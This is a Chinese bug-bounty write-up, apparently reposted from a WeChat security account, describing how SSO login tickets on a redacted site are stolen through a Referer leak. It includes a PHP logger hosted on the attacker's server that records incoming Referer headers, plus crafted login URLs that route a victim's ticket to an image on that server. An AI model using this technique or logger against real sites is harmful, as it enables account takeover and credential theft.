实战 | 漏洞挖掘之众测厂商 Ticket劫持漏洞
2023-2-7 09:3:21 Author: HACK学习呀(查看原文) 阅读量:18 收藏

0x00 前言

文章中的项目地址统一修改为: test.com 保护厂商也保护自己

0x01 前期准备

受害者账号: 18******977
攻击者账号: tsetaaaa
攻击者服务器:123.207.33.78
攻击文件:img_referer.php
访问 url:http://123.207.33.78/img_referer.php
攻击代码:
<?php
if ($_SERVER['HTTP_REFERER']) {
file_put_contents('./img_referer.txt', $_SERVER['HTTP_REFERER'].PHP_EOL, FILE_APPEND);
}

0x02 场景

绕不过 service 字段的白名单验证所以换了此方法进行绕过获取

白名单触发:http://yun.test.com/index.php?r=portal/user/login&service=http://baidu.com


白名单通过:http://yun.test.com/index.php?r=portal/user/login&service=http://xxxxxxxxxxx.test.com/


名单做的比较死只允许 *.test.com 跳转进行登录
思考了一下可以找一处可以显示插入图片的地方,利用图片来绕过获取到 ticket

0x03 攻击开始

0x03.1 登录攻击者账号准备攻击

攻击者空间装扮 url: http://yun.test.com/index.php?r=space/person/show&sid=4c7ccfb4c0b6418b83991a57ccb7175f


攻击者 url: http://yun.test.com/index.php?r=portal/user/login&service=http%3A%2F%2Fyun.test.com%2Findex.php%3Fr%3Dspace%2Fperson%2Fshow%26sid%3D4c7ccfb4c0b6418b83991a57ccb7175f

0x3.2 受害者上线

受害者记得要登录

受害者打开 url: http://yun.test.com/index.php?r=portal/user/login&service=http%3A%2F%2Fyun.test.com%2Findex.php%3Fr%3Dspace%2Fperson%2Fshow%26sid%3D4c7ccfb4c0b6418b83991a57ccb7175f


推荐阅读:

实战 | 记一次SSRF攻击内网的实战案例

实战 | 记两次应急响应小记

干货 | Wordpress网站渗透方法指南

实战 | 记一次CTF题引发的0day挖掘

2023年零基础+进阶系统化白帽黑客学习 | 2月份最新版

实战 | 记一次邮件系统C段引发的SQL手注和内网渗透

点赞,转发,在看

原文地址:语雀文档

作者:P喵呜


文章来源: http://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247511386&idx=1&sn=d188a2ecb48ff7bce2eb59a7feb3b35d&chksm=ec1cf865db6b717380043eb40df8c356483bba0295101bf43e3256af1645c245700fdc9c7973#rd
如有侵权请联系:admin#unsafe.sh